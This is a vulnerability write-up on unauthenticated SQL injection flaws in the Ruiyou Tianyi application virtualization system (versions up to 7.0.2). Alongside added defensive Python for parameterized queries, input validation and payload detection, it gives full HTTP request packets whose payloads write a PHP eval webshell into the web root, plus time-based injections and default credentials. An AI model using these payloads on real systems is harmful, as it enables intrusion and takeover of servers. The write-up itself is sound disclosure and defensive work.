Vulnerability Profile
The Weibu online vulnerability team obtained remote code execution vulnerability intelligence (0day) for the Ruiyou Tianyi application virtualization system through the "X Vulnerability Reward Program". An attacker can execute arbitrary code through this vulnerability, resulting in the system being attacked and controlled. The Ruiyou Tianyi application virtualization system is an application virtualization platform based on a server-side computing architecture. It centrally deploys the user's various application software onto a Ruiyou Tianyi service cluster, and clients access the authorized application software on the server through the web, providing centralized applications, remote access, collaborative office work, and so on.
The vulnerability exists because an unauthenticated interface performs no validation of the parameters it receives, which yields a SQL injection; because the MySQL instance in the bundled environment has permission to write files, a webshell can be written to disk, which ultimately leads to code execution.
Affected version
5.x <= Ruiyou Tianyi application virtualization system (GWT System) <= 7.0.2.
Environment build
The installation package Gwt7.0.2.1.exe copied from the master is installed in the default mode. Finally, register online to obtain a trial at http://mop.realor.cn/TrialReg.aspx. After successful registration:
The default login account/password is Admin/123.
The default web root path is C:/Program Files (x86)/RealFriend/Rap Server/WebRoot.
The default database configuration file is C:\Program Files (x86)\RealFriend\Rap Server\data\Config\CasDbCnn.dat.
To recover the account and password stored there, replace # with = and base64-decode the result.
Vulnerability reproduction and analysis
View version information via http://192.168.222.148/RAPAgent.XGI?CMD=GetRegInfo
To see the complete SQL actually executed by the back end, use the framework's getLastSql() method to retrieve the last executed SQL statement.
Injection 1: IndexController.class.php dologin
webroot/casweb/Home/Controller/IndexController.class.php:dologin
We see the SQL statement and the request route for this function:
http://www.casweb.cn.x/index.php?s=/Index/dologin/name/admin/pwd/c4ca4238a0b923820dcc509a6f75849b
Construct a request packet and print the corresponding SQL statement.
Because the CAPTCHA is not enabled by default, the SQL statement can be reached directly.
Because the environment was set up with the bundled MySQL, which runs with DBA privileges, content can be written to any directory:
show global variables like '%secure%';
secure_file_priv='' #Allow writing to any folder
Use the error message to obtain the absolute path of the project.
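The defect in dologin is that the request values are spliced into the SQL text, so a name beginning with 1') closes the WHERE clause and the rest of the input becomes SQL. As an added example (not code from the write-up or from the vendor), the following Python script places that vulnerable pattern beside the parameterized form. It uses an in-memory SQLite database with a constructed sys_user table instead of the product's MySQL schema, so the table and column names are assumptions and the hostile input uses SQLite's -- comment where MySQL accepts #; the stored hash is md5('1'), the value that appears in the dologin URL above.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed stand-in for the product's user table; names and columns are assumptions."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE sys_user (name TEXT NOT NULL, pwd TEXT NOT NULL)")
    # Stored value is md5('1'), the same hash that appears in the dologin URL above.
    conn.execute("INSERT INTO sys_user VALUES ('admin', 'c4ca4238a0b923820dcc509a6f75849b')")
    conn.commit()
    return conn


def login_concat(conn: sqlite3.Connection, name: str, pwd: str) -> list:
    """Vulnerable pattern: request values are spliced into the SQL text, so quotes and
    parentheses in the input change the query structure."""
    sql = f"SELECT name FROM sys_user WHERE (name='{name}' AND pwd='{pwd}')"
    return [row[0] for row in conn.execute(sql)]


def login_param(conn: sqlite3.Connection, name: str, pwd: str) -> list:
    """Hardened pattern: the same query, but the values travel as bound parameters and
    can never be parsed as SQL."""
    sql = "SELECT name FROM sys_user WHERE (name=? AND pwd=?)"
    return [row[0] for row in conn.execute(sql, (name, pwd))]


if __name__ == "__main__":
    conn = make_db()
    # Constructed input: closes the '(' the way the write-up's payload does, then comments
    # out the remainder of the statement (SQLite uses '--' where MySQL accepts '#').
    hostile_name = "1') OR 1=1 --"
    print("concat, wrong password:", login_concat(conn, hostile_name, "wrong"))  # ['admin']
    print("param,  wrong password:", login_param(conn, hostile_name, "wrong"))   # []
    print("param,  right password:", login_param(conn, "admin", "c4ca4238a0b923820dcc509a6f75849b"))
```

The concatenated version returns the admin row without a valid password; the parameterized version returns nothing for the same input and only matches when the real hash is supplied. The database side of the chain is independent of the query fix: in MySQL an empty secure_file_priv places no restriction on SELECT ... INTO OUTFILE, a directory value restricts writes to that directory, and NULL disables file writes entirely, so the web application's database account should not hold the FILE privilege and secure_file_priv should not be empty.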
Construct the payload:
POST /index.php?s=/Index/dologin/name HTTP/1.1
Host: 192.168.222.148
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 221
name=1')+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31, '<?php eval($_REQUEST["cmd"]);?>' into outfile 'C:/Program Files (x86)/RealFriend/Rap Server/WebRoot/dologin.php'#
Query the account and password of the administrator user
Injection 2: ConsoleExternalUploadApi.XGI
webroot/ConsoleExternalUploadApi.XGI
Three parameters are read; when none of them is empty, getfarminfo is called to process them.
webroot/Function.XGI
webroot/Common.XGI
No verification is performed on them in either file.
POST /ConsoleExternalUploadApi.XGI HTTP/1.1
Host: 192.168.222.148
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Length: 46
Content-Type: application/x-www-form-urlencoded
initParams=1&sign=2&key=FarmName'and sleep(5)#
The code was modified to print out the SQL command.
Construct the injection and write the file:
POST /ConsoleExternalUploadApi.XGI HTTP/1.1
Host: 192.168.222.148
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Length: 170
Content-Type: application/x-www-form-urlencoded
initParams=1&sign=1&key=1'union select '<?php eval($_REQUEST["cmd"]);?>' into outfile 'C:/Program Files (x86)/RealFriend/Rap Server/WebRoot/ConsoleExternalUploadApi.php'#
Injection 3: ConsoleExternalUploadApi.XGI uploadAuthorizeKeyFile
POST /ConsoleExternalUploadApi.XGI HTTP/1.1
Host: 192.168.222.148
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 122
initParams=command_uploadAuthorizeKeyFile__user_admin'and+sleep(5)#__pwd_1&key=inner&sign=d3adb9869bd6a377fa452930d920fd10
Injection 4: ConsoleExternalApi.XGI createUser
The remaining injections are essentially the same vulnerability; they differ only in which parameters are passed to which locations. Only one is analyzed in detail here; the rest are listed without further analysis.
We start the analysis from ConsoleExternalApi.XGI, where the parameters are obtained.
From the following code we can draw these conclusions: when the value of $key is inner, $keyVal is a fixed value, and the value of $sign is md5($initparams . $keyVal).
$initparams must contain __, which is used to split the data into individual parameters; each parameter is then split on _ to obtain its value. That is, when the incoming value is a_1__b_2, the final result is a=1&b=2.
Continuing the analysis: when the incoming cmd value is createUser, the corresponding branch is entered, and the corresponding statement can be constructed to achieve injection.
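The initParams format and the sign check described above, as an added example that is not code from the write-up or the vendor: a Python parser for the a_1__b_2 encoding, the md5($initparams . $keyVal) signature check, and the input validation the original handler lacks. The real fixed keyVal is not given on the page, so a labelled placeholder stands in for it; the allowlist of command names and the per-value character allowlist are assumptions; and the parser splits each item at its first _ (the write-up does not say how a value containing _ is treated). The signature check is reproduced to show that it does not protect the query: anyone who knows the fixed keyVal produces a valid sign over any initParams, so the values still have to be validated before they reach SQL.

```python
import hashlib
import hmac
import re

# The real fixed keyVal is not given in the write-up; this is a labelled placeholder.
KEY_VAL_PLACEHOLDER = "KEYVAL-PLACEHOLDER"

# Command names the write-up shows reaching SQL; anything else is rejected before dispatch.
ALLOWED_COMMANDS = {"createUser", "getUserDetailByAccount", "uploadAuthorizeKeyFile"}

# Allowlist for account-style values (an assumption): quotes, spaces, '#' and '(' never pass.
SAFE_VALUE = re.compile(r"[A-Za-z0-9_.@-]{1,64}")
HEX_MD5 = re.compile(r"[0-9a-f]{32}")


def parse_init_params(init_params: str) -> dict:
    """Split 'a_1__b_2' into {'a': '1', 'b': '2'}: '__' separates items and the first '_'
    in each item separates the name from its value."""
    params = {}
    for item in init_params.split("__"):
        if not item:
            continue
        name, sep, value = item.partition("_")
        if not sep:
            raise ValueError(f"malformed item: {item!r}")
        params[name] = value
    return params


def compute_sign(init_params: str, key_val: str = KEY_VAL_PLACEHOLDER) -> str:
    """sign = md5(initParams . keyVal), as the write-up describes for key == 'inner'."""
    return hashlib.md5((init_params + key_val).encode()).hexdigest()


def sign_is_valid(init_params: str, key: str, sign: str, key_val: str = KEY_VAL_PLACEHOLDER) -> bool:
    """Constant-time comparison of the supplied sign against the recomputed one."""
    if key != "inner" or not HEX_MD5.fullmatch(sign):
        return False
    return hmac.compare_digest(compute_sign(init_params, key_val), sign)


def validate_request(init_params: str, key: str, sign: str, key_val: str = KEY_VAL_PLACEHOLDER) -> dict:
    """Return the parsed parameters, or raise ValueError for anything that must not reach a query."""
    if not sign_is_valid(init_params, key, sign, key_val):
        raise ValueError("signature check failed")
    params = parse_init_params(init_params)
    if params.get("command") not in ALLOWED_COMMANDS:
        raise ValueError(f"unknown command: {params.get('command')!r}")
    for name, value in params.items():
        if name != "command" and not SAFE_VALUE.fullmatch(value):
            raise ValueError(f"rejected value for {name!r}: {value!r}")
    return params


def is_acceptable(init_params: str, key: str, sign: str, key_val: str = KEY_VAL_PLACEHOLDER) -> bool:
    """Boolean wrapper around validate_request for logging or tests."""
    try:
        validate_request(init_params, key, sign, key_val)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    # Constructed inputs shaped like the initParams strings in the write-up; each carries a
    # correctly computed sign, so only the value allowlist separates the benign one from the rest.
    for ip in (
        "command_createUser__user_admin__pwd_1",
        "command_uploadAuthorizeKeyFile__user_admin'and sleep(5)#__pwd_1",
        "command_getUserDetailByAccount__user_admin__account_1' or sleep(5) and '1",
    ):
        verdict = "accepted" if is_acceptable(ip, "inner", compute_sign(ip)) else "rejected"
        print(f"{ip!r} -> {verdict}")
```

Run stand-alone, the first string is accepted and the other two are rejected even though their signatures verify, which is the point: the sign binds the request to knowledge of keyVal, not to safe content.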
POST /ConsoleExternalApi.XGI?initParams=command_createUser__user_admin__pwd_1&key=inner&sign=bd58378906794858b1f57eb272e5d84f HTTP/1.1
Host: 192.168.222.148
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Length: 46
Content-Type: application/json
{"account":"1'or sleep(5)#",
"userPwd":"1"}
Injection 5: ConsoleExternalApi.XGI getUserDetailByAccount
POST /ConsoleExternalApi.XGI HTTP/1.1
Host: 192.168.222.148
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 132
initParams=command_getUserDetailByAccount__user_admin__account_1' or sleep(5) and '1&key=inner&sign=e24b8206a168347821a2f10aede99058
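All five injections above share a small set of request shapes: a union select with into outfile aimed at the web root, sleep() for time-based confirmation, and a PHP open tag in the written file. As an added example (not code from the write-up or the vendor), the following Python detector applies signatures for those shapes to request records and raises the severity when the route is one of the endpoints named in this write-up. The sample records are constructed to mirror the requests above, not captured traffic; the endpoint list, the signature set and the severity levels are assumptions, and the signatures are modelled on this page's payloads rather than being a general SQL injection ruleset. A second function covers the host side: script files that appear in the web root after a baseline listing.

```python
import re
from urllib.parse import unquote_plus

# Endpoints named in the write-up; a match on one of these is treated as high severity.
WATCHED_PATHS = (
    "/index.php",
    "/ConsoleExternalUploadApi.XGI",
    "/ConsoleExternalApi.XGI",
)

# Signatures modelled on the payload shapes in the write-up, not a complete SQLi ruleset.
SIGNATURES = {
    "file_write": re.compile(r"\binto\s+(?:out|dump)file\b", re.I),
    "time_based": re.compile(r"\b(?:sleep|benchmark)\s*\(", re.I),
    "union": re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I),
    "php_tag": re.compile(r"<\?php", re.I),
}


def normalize(text: str) -> str:
    """URL-decode twice so '+' becomes a space and double-encoded payloads are still visible."""
    return unquote_plus(unquote_plus(text))


def inspect_request(path: str, body: str = "") -> dict:
    """Return the signature names matching a request's path+query and body, plus a severity."""
    haystack = normalize(path) + "\n" + normalize(body)
    hits = [name for name, rx in SIGNATURES.items() if rx.search(haystack)]
    route = path.split("?", 1)[0]
    if not hits:
        severity = "none"
    elif route in WATCHED_PATHS:
        severity = "high"
    else:
        severity = "medium"
    return {"path": route, "hits": hits, "severity": severity}


def new_web_files(baseline: set, current: set, suffixes=(".php",)) -> set:
    """Host-side check: script files that appeared in the web root since the baseline listing."""
    return {f for f in current - baseline if f.lower().endswith(suffixes)}


# Constructed sample records shaped like the requests in the write-up (not captured traffic).
SAMPLE_REQUESTS = [
    ("/RAPAgent.XGI?CMD=GetRegInfo", ""),
    ("/index.php?s=/Index/dologin/name", "name=admin&pwd=c4ca4238a0b923820dcc509a6f75849b"),
    ("/index.php?s=/Index/dologin/name",
     "name=1')+union+select+1,2,3,'<?php eval($_REQUEST[\"cmd\"]);?>' into outfile 'C:/x/dologin.php'#"),
    ("/ConsoleExternalUploadApi.XGI", "initParams=1&sign=2&key=FarmName'and sleep(5)#"),
    ("/ConsoleExternalApi.XGI?initParams=command_createUser__user_admin__pwd_1&key=inner&sign=x",
     '{"account":"1\'or sleep(5)#","userPwd":"1"}'),
]


def scan(records=SAMPLE_REQUESTS) -> list:
    """Run inspect_request over the records and keep only those with at least one hit."""
    return [r for r in (inspect_request(p, b) for p, b in records) if r["hits"]]


if __name__ == "__main__":
    for finding in scan():
        print(finding)
    # Constructed listings of the web root before and after an incident.
    before = {"index.php", "RAPAgent.XGI"}
    after = {"index.php", "RAPAgent.XGI", "dologin.php"}
    print("new script files in web root:", new_web_files(before, after))
```

Against the sample set the benign version probe and the ordinary login produce no finding, while the three injection-shaped records are reported as high severity. The file check is deliberately independent of the request signatures: a written shell is a file-system event whether or not the request that caused it was logged, so a periodic diff of the web root against a known-good listing catches the end of the chain even if the start was missed.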